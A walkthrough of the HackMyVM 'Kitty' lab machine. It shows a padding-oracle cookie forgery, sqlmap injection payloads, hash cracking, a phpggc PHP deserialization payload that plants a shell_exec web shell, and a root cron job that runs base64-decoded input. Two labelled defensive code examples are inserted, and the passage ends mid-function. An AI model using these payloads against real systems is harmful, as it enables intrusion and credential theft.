HackMyVM-Kitty-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.138 08:00:27:ad:a1:49 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:ff:d5:c8 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.051 seconds (124.82 hosts/sec). 4 responded
export ip=192.168.60.138
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.138:22
Open 192.168.60.138:80
Open 192.168.60.138:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-15 15:04 CST
Initiating ARP Ping Scan at 15:04
Scanning 192.168.60.138 [1 port]
Completed ARP Ping Scan at 15:04, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:04
Completed Parallel DNS resolution of 1 host. at 15:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:04
Scanning 192.168.60.138 [3 ports]
Discovered open port 3000/tcp on 192.168.60.138
Discovered open port 80/tcp on 192.168.60.138
Discovered open port 22/tcp on 192.168.60.138
Completed SYN Stealth Scan at 15:04, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.138
Host is up, received arp-response (0.00040s latency).
Scanned at 2025-04-15 15:04:56 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 64
MAC Address: 08:00:27:AD:A1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Opening the site in a browser shows that it is bound to a domain name.

Edit the hosts file and add the domain.

echo "$ip kitty.hmv"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.60.138 kitty.hmv

Try port 3000.

It runs a Gitea service with private repositories. No weak password worked, so return to port 80.

Directory Enumeration

❯ gobuster dir -u http://kitty.hmv/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://kitty.hmv/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 169] [--> http://kitty.hmv/images/]
/css (Status: 301) [Size: 169] [--> http://kitty.hmv/css/]
/js (Status: 301) [Size: 169] [--> http://kitty.hmv/js/]
/index.html (Status: 200) [Size: 5381]
/license.txt (Status: 200) [Size: 1244]
Progress: 132920 / 132925 (100.00%)
===============================================================
Finished
===============================================================

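A quick look in the browser suggests there are no other paths; the site is just a stock template.

Subdomain Enumeration

Using this domain, try enumerating subdomains; this yields cookie.kitty.hmv.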

❯ wfuzz -c -u "http://kitty.hmv/" -H "HOST:FUZZ.kitty.hmv" -H "User-Agent:Mozilla/5.0" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 11
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://kitty.hmv/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000003045: 200 37 L 105 W 2785 Ch "cookie - cookie"

Edit the hosts file again.

echo "$ip cookie.kitty.hmv"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.60.138 cookie.kitty.hmv

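Opening it in a browser shows a registration feature.

Testing shows that an admin user already exists.

A new user can still be registered, though.

After registration the user is logged in automatically and assigned a cookie.

Here we can use padbuster, a script that automates padding oracle attacks.

In CBC mode, the last block being encrypted may need padding to align it to the fixed block size.

If the server's error responses distinguish correct padding from incorrect padding, the data can be decrypted byte by byte.

We decrypt the ciphertext in this cookie and then rewrite it in order to forge the admin user.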

❯ padbuster http://cookie.kitty.hmv/home/index.php m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU 8 -cookies 'auth=m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU'

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (79/256) [Byte 8]
[+] Success: (55/256) [Byte 7]
[+] Success: (91/256) [Byte 6]
[+] Success: (120/256) [Byte 5]
[+] Success: (220/256) [Byte 4]
[+] Success: (163/256) [Byte 3]
[+] Success: (43/256) [Byte 2]
[+] Success: (26/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): ed90fd022871501c
[+] Intermediate Bytes (HEX): eed25b218ca6cbb0
[+] Plain Text: user=abc

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (235/256) [Byte 8]
[+] Success: (166/256) [Byte 7]
[+] Success: (134/256) [Byte 6]
[+] Success: (220/256) [Byte 5]
[+] Success: (241/256) [Byte 4]
[+] Success: (13/256) [Byte 3]
[+] Success: (97/256) [Byte 2]
[+] Success: (19/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): efd7767ec5782994
[+] Intermediate Bytes (HEX): e598f50a20795814
[+] Plain Text:

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=abc

[+] Decrypted value (HEX): 757365723D6162630808080808080808

[+] Decrypted value (Base64): dXNlcj1hYmMICAgICAgICA==

-------------------------------------------------------

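The decryption above shows that my data is user=abc. The -plaintext option works in the other direction and encrypts a chosen plaintext.

Change it to user=admin.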

❯ padbuster http://cookie.kitty.hmv/home/index.php m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU 8 -cookies 'auth=m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU' -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
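
The following added example (not from the original write-up or the target application) recomputes both plaintexts from the ciphertext and intermediate bytes that padbuster printed above, using the CBC relation P_i = D(C_i) XOR C_(i-1), to show why a CBC cookie without integrity protection can be rewritten. It then shows the mitigation: a token whose HMAC is verified before anything is parsed, with one indistinguishable failure result. The function names and the HMAC token layout are assumptions chosen for illustration.

```python
import base64
import hashlib
import hmac
from urllib.parse import unquote

BLOCK = 8  # block size passed to padbuster on this page

# Values copied from the two padbuster runs shown above.
ORIG_COOKIE = "m6E%2BU7HHqdPtkP0CKHFQHO%2FXdn7FeCmU"
ORIG_INTERMEDIATE = ["eed25b218ca6cbb0", "e598f50a20795814"]
FORGED_COOKIE = "BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA"
FORGED_INTERMEDIATE = ["717bc86beb4fdefe", "4a6d7e23d3a76e3d"]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def strip_pkcs7(data: bytes) -> bytes:
    """Remove PKCS#7 padding, rejecting malformed padding."""
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_plaintext(cookie: str, intermediates: list) -> bytes:
    """Recompute P_i = D(C_i) XOR C_(i-1) from the printed intermediate bytes.

    The first 8 bytes of the cookie are the IV. No key is involved: whoever
    controls C_(i-1) controls P_i, so CBC alone cannot protect the identity
    stored in the cookie.
    """
    raw = base64.b64decode(unquote(cookie))
    blocks = [raw[i:i + BLOCK] for i in range(0, len(raw), BLOCK)]
    plain = b"".join(
        xor(bytes.fromhex(inter), prev) for inter, prev in zip(intermediates, blocks)
    )
    return strip_pkcs7(plain)


# Hardened form (hypothetical layout): base64(payload) + "." + HMAC-SHA256 tag.
def issue_token(user: str, key: bytes) -> str:
    body = base64.urlsafe_b64encode(f"user={user}".encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_token(token: str, key: bytes):
    """Return the payload, or None for every kind of failure (no oracle)."""
    try:
        body, tag = token.split(".")
        expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
        # Constant-time comparison, done before the payload is decoded.
        if not hmac.compare_digest(tag.encode(), expected.encode()):
            return None
        return base64.urlsafe_b64decode(body).decode()
    except (ValueError, UnicodeError):
        return None


if __name__ == "__main__":
    print(cbc_plaintext(ORIG_COOKIE, ORIG_INTERMEDIATE))
    print(cbc_plaintext(FORGED_COOKIE, FORGED_INTERMEDIATE))
    demo_key = b"constructed-demo-key-not-a-secret"
    token = issue_token("abc", demo_key)
    print(verify_token(token, demo_key))
    # Swapping the payload while keeping the old tag is rejected.
    swapped = base64.urlsafe_b64encode(b"user=admin").decode() + "." + token.split(".")[1]
    print(verify_token(swapped, demo_key))
```

On the server side the same rule applies to any response path: a padding failure, a MAC failure and an unknown user must all produce the same status, body and redirect.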

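SQL Injection

After replacing the cookie with the new one, a new page, logs, appears.

Clicking it does not navigate to another page; it only appends an anchor to the URL.

Inspecting the element shows that the code next to the parent element of logs loads the JavaScript file ../config/last_login.js.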

async function getUsers() {
    let url = 'http://cookie.kitty.hmv/home/logs.php?ajneya=admin';
    try {
        let res = await fetch(url);
        return await res.text();
    } catch (error) {
        console.log(error);
    }
}

async function renderUsers() {
    let users = await getUsers();
    let container = document.querySelector('.content');
    container.innerHTML = users;
}

renderUsers();

From this we can guess that a SQL injection vulnerability exists.

Run sqlmap against it, passing the admin cookie.

❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch --dbs
……………… omitted ………………
---
Parameter: ajneya (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ajneya=') AND (SELECT 2969 FROM (SELECT(SLEEP(5)))izET) AND ('Ttnh'='Ttnh

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ajneya=') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707871,0x587a534c78507167514d614676706c46514576726a6c7a4a6e43537a425a466c62686a5347666967,0x7178717671)-- -
---
[08:51:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:51:22] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] padding

❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch -D padding --tables

+-------+
| logs |
| salt |
| users |
+-------+


❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch -D padding -T users --dump

+----------------------------------+----------+
| password | username |
+----------------------------------+----------+
| 44db80f98c693eac47540c51137eeeac | admin |
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea |
| 389f0e97fd82500213e3273c83bfadf7 | aaa |
| f9c6608c9747c3722a244bc797a28578 | abc |
+----------------------------------+----------+

❯ sqlmap -u "http://cookie.kitty.hmv/home/logs.php?ajneya=" --cookie="auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA" --batch -D padding -T salt --dump

+--------+--------------+
| type | value |
+--------+--------------+
| salt | YXZpam5leWFt |
+--------+--------------+

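Cracking with Hashcat

The dump gives us the gitea user's credentials and the salt used to hash the passwords.

The salt is actually just the Base64 encoding of avijneyam, the author's nickname, haha.

Try cracking the salted MD5 with hashcat.

This recovers the password git0ffme.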

echo "357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt"|tee hash
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt
❯ hashcat -a 0 -m 10 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
……………… omitted ………………

357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10 (md5($pass.$salt))
Hash.Target......: 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt
Time.Started.....: Fri Apr 18 09:05:33 2025 (3 secs)
Time.Estimated...: Fri Apr 18 09:05:36 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3540.5 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7866368/14344385 (54.84%)
Rejected.........: 0/7866368 (0.00%)
Restore.Point....: 7864320/14344385 (54.83%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: giuli89 -> gisel1207

Started: Fri Apr 18 09:05:33 2025
Stopped: Fri Apr 18 09:05:38 2025

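Log in to the Gitea service with the credentials gitea:git0ffme.

A closed issue reveals another domain, whythisapiissofast.kitty.hmv.

Open it in a browser.

It turns out to be an API endpoint.

Query the API paths with curl.

Requesting the numbers -1 and -2 returns a username and the contents of a private key.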

❯ curl whythisapiissofast.kitty.hmv/api/v1/public
{"key":"success","value":"Hello from a public endpoint! You don't need to be authenticated to see this."}
❯ curl whythisapiissofast.kitty.hmv/api/v2/1
{"Error":"1 is Wrong Number. Try Again!"}
❯ curl whythisapiissofast.kitty.hmv/api/v2/-1
{"success":"Yay! You Found Login Credentials","Credentials":"nobody : 74k3!7345y"}
❯ curl whythisapiissofast.kitty.hmv/api/v2/-2

With the private key saved to a file, convert the escaped newlines into real line breaks.

cat id_rsa|sed 's/\\n/\n/g'

Gaining User Access

The comment field of the private key gives the user dyutidhara.

❯ ssh-keygen -c -f id_rsa
Old comment: dyutidhara@free4all
New comment:

Connect over SSH.

That gives us the user flag.

❯ ssh dyutidhara@$ip -i id_rsa
The authenticity of host '192.168.60.138 (192.168.60.138)' can't be established.
ED25519 key fingerprint is SHA256:hyaH0n5p7+5xBVQEL/hRIeOVRNWsLv8qjefRknYQi6Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.138' (ED25519) to the list of known hosts.
Linux kitty 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 29 06:39:26 2022 from 192.168.1.5
dyutidhara@kitty:~$ cat user.txt
3702f4d1247163b61b1cd8b368539cbf

Ports 8000 and 3306 are also listening locally.

dyutidhara@kitty:/opt/opencats$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 2048 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 4096 *:3000 *:*

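Requests to the whythisapiissofast.kitty.hmv API endpoint are in fact forwarded to local port 8000.

There is also a directory /opt/opencats under /opt.

The nginx configuration reveals another domain, thisisnotcatitisopencats.kitty.hmv.

Edit the hosts file again.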

dyutidhara@kitty:/tmp$ cat /etc/nginx/sites-available/opencats
server {
    listen 80;
    server_name thisisnotcatitisopencats.kitty.hmv;
    root /opt/opencats;
    index index.html index.htm index.php;
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/power.sock;
    }

}

Password Disclosure

We now have white-box access, so we can read the opencats config file.

It contains the database connection credentials opencats:0p3nc@75.

dyutidhara@kitty:/opt/opencats$ mysql -uopencats -p0p3nc@75
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 9466
Server version: 10.5.15-MariaDB-1:10.5.15+maria~bullseye mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| opencats |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use opencats;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [opencats]> select * from user\G
*************************** 1. row ***************************
user_id: 1
site_id: 1
user_name: admin
email: [email protected]
password: 370835cf169b8c84c112ad32811ba1d6
access_level: 500
can_change_password: 1
is_test_user: 0
last_name: Administrator
first_name: CATS
is_demo: 0
categories: NULL
session_cookie: CATS=qelf7cm7p2t4436csodak92r0a
pipeline_entries_per_page: 15
column_preferences: a:4:……………… omitted ………………
force_logout: 0
title:
phone_work:
phone_cell:
phone_other:
address: NULL
notes: NULL
company: NULL
city: NULL
state: NULL
zip_code: NULL
country: NULL
can_see_eeo_info: 0
*************************** 2. row ***************************
user_id: 1250
site_id: 180
user_name: cats@rootadmin
email: 0
password: cantlogin
access_level: 0
can_change_password: 0
is_test_user: 0
last_name: Automated
first_name: CATS
is_demo: 0
categories: NULL
session_cookie: NULL
pipeline_entries_per_page: 15
column_preferences: NULL
force_logout: 0
title:
phone_work:
phone_cell:
phone_other:
address: NULL
notes: NULL
company: NULL
city: NULL
state: NULL
zip_code: NULL
country: NULL
can_see_eeo_info: 0
2 rows in set (0.000 sec)

MariaDB [opencats]>

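This gives us a username and a password hash.

The plaintext password is 4jn3y4.

Root Privilege Escalation

Log in through the browser.

The version shown is OpenCATS Version 0.9.5.2.

Look for a related PoC.

PHP Deserialization

OpenCATS PHP Object Injection to Arbitrary File Write |💻 | Blog

According to the link above, this version has a deserialization vulnerability.

The phpggc tool is needed to build the deserialization payload.

ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from the command line or programmatically.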

❯ git clone https://github.com/ambionics/phpggc.git
Cloning into 'phpggc'...
remote: Enumerating objects: 4769, done.
remote: Counting objects: 100% (887/887), done.
remote: Compressing objects: 100% (279/279), done.
remote: Total 4769 (delta 687), reused 608 (delta 608), pack-reused 3882 (from 2)
Receiving objects: 100% (4769/4769), 695.29 KiB | 2.28 MiB/s, done.
Resolving deltas: 100% (2186/2186), done.
echo '<?php echo shell_exec($_GET["e"] . " 2>&1"); ?>' | tee shell.php
<?php echo shell_exec($_GET["e"] . " 2>&1"); ?>
❯ ./phpggc -u --fast-destruct Guzzle/FW1 /opt/opencats/shell.php shell.php

a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A48%3A%22%3C%3Fphp%20echo%20shell_exec%28%24_GET%5B%22e%22%5D%20.%20%22%202%3E%261%22%29%3B%20%3F%3E%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A23%3A%22%2Fopt%2Fopencats%2Fshell.php%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

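URL-decoding the payload shows its structure.

However, trying to write a web shell into the opt/opencats directory does not work; the server returns a 500 error.

This is because only root has write permission on this directory.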

dyutidhara@kitty:/opt$ ls -al
total 12
drwxr-x--x 3 root dyutidhara 4096 Mar 29 2022 .
drwxr-xr-x 18 root root 4096 Mar 29 2022 ..
drwxr-xr-x 23 root root 4096 Mar 27 2022 opencats

So change the target to /tmp/shell.php and try again.

❯ ./phpggc -u --fast-destruct Guzzle/FW1 /tmp/shell.php /home/Pepster/hmv/phpggc/shell.php
a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A48%3A%22%3C%3Fphp%20echo%20shell_exec%28%24_GET%5B%22e%22%5D%20.%20%22%202%3E%261%22%29%3B%20%3F%3E%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A14%3A%22%2Ftmp%2Fshell.php%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

This shows that the opencats service runs as the power user.

dyutidhara@kitty:/tmp$ ls -al shell.php
-rw-r--r-- 1 power power 95 Apr 17 23:55 shell.php
dyutidhara@kitty:/tmp$ cat shell.php
[{"Expires":1,"Discard":false,"Value":"<?php echo shell_exec($_GET[\"e\"] . \" 2>&1\"); ?>\n"}]
dyutidhara@kitty:/tmp$ id power
uid=1001(power) gid=1001(power) groups=1001(power)

The scheduled tasks also show that root runs a job periodically.

dyutidhara@kitty:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * root [ -f /usr/local/etc/newfile.txt ] && /usr/bin/sed -e 's/\[{"Expires":1,"Discard":false,"Value":"//' -e 's/\\n"}]//' /usr/local/etc/newfile.txt > /usr/local/etc/payload.txt | for i in $(/usr/bin/cat /usr/local/etc/payload.txt); do /usr/bin/echo $i | /usr/bin/base64 -d | /usr/bin/bash; done
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

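File existence check

  • Execution continues only if /usr/local/etc/newfile.txt exists.

Content extraction and formatting

  • The sed command extracts the base64 string from the JSON wrapper.

Decoding and executing the payload

  • Each line of payload.txt is read (expected to be a base64-encoded shell command),
  • then base64-decoded and executed through bash.

In addition, the power user has write permission on the /usr/local/etc directory.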

dyutidhara@kitty:/tmp$ ls -al /usr/local/
total 40
drwxr-xr-x 10 root root 4096 Mar 25 2022 .
drwxr-xr-x 14 root root 4096 Jan 12 2022 ..
drwxr-xr-x 2 root root 4096 Mar 26 2022 bin
drwxrwx--- 2 root power 4096 Mar 29 2022 etc
drwxr-xr-x 2 root root 4096 Jan 12 2022 games
drwxr-xr-x 2 root root 4096 Jan 12 2022 include
drwxr-xr-x 4 root root 4096 Mar 25 2022 lib
lrwxrwxrwx 1 root root 9 Jan 12 2022 man -> share/man
drwxr-xr-x 2 root root 4096 Jan 12 2022 sbin
drwxr-xr-x 5 root root 4096 Mar 7 2022 share
drwxr-xr-x 3 root root 4096 Mar 28 2022 src
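
The following added example (not from the original write-up) shows how this misconfiguration can be found during a host audit: it parses system crontab lines and, for each root job, reports referenced paths whose directory is writable by someone other than root, and whether the job pipes data into a shell. The function names are made up for illustration; the sample crontab job and the /usr/local/etc permissions are copied from the output on this page.

```python
import os
import posixpath
import re
import stat

# Root job copied from the /etc/crontab shown above, plus one stock entry.
CRONTAB = r'''
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root [ -f /usr/local/etc/newfile.txt ] && /usr/bin/sed -e 's/\[{"Expires":1,"Discard":false,"Value":"//' -e 's/\\n"}]//' /usr/local/etc/newfile.txt > /usr/local/etc/payload.txt | for i in $(/usr/bin/cat /usr/local/etc/payload.txt); do /usr/bin/echo $i | /usr/bin/base64 -d | /usr/bin/bash; done
17 * * * * root cd / && run-parts --report /etc/cron.hourly
'''

# Directory facts copied from the `ls -al /usr/local/` output above:
# directory -> (mode string, owner, group). Other directories are unknown here.
PAGE_PERMS = {"/usr/local/etc": ("drwxrwx---", "root", "power")}

# Absolute paths that are not part of a quoted sed expression.
PATH_RE = re.compile(r'''(?<![\w'"\\/])/[\w.\-]+(?:/[\w.\-]+)*''')
# A pipe whose right-hand side is a shell interpreter: the job executes data.
SHELL_PIPE_RE = re.compile(r"\|\s*(?:\S*/)?(?:ba|da|z)?sh\b")


def parse_system_crontab(text):
    """Return (user, command) for each job line of an /etc/crontab style file."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank line, comment or environment assignment
        fields = line.split(None, 6)  # 5 time fields, user, command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
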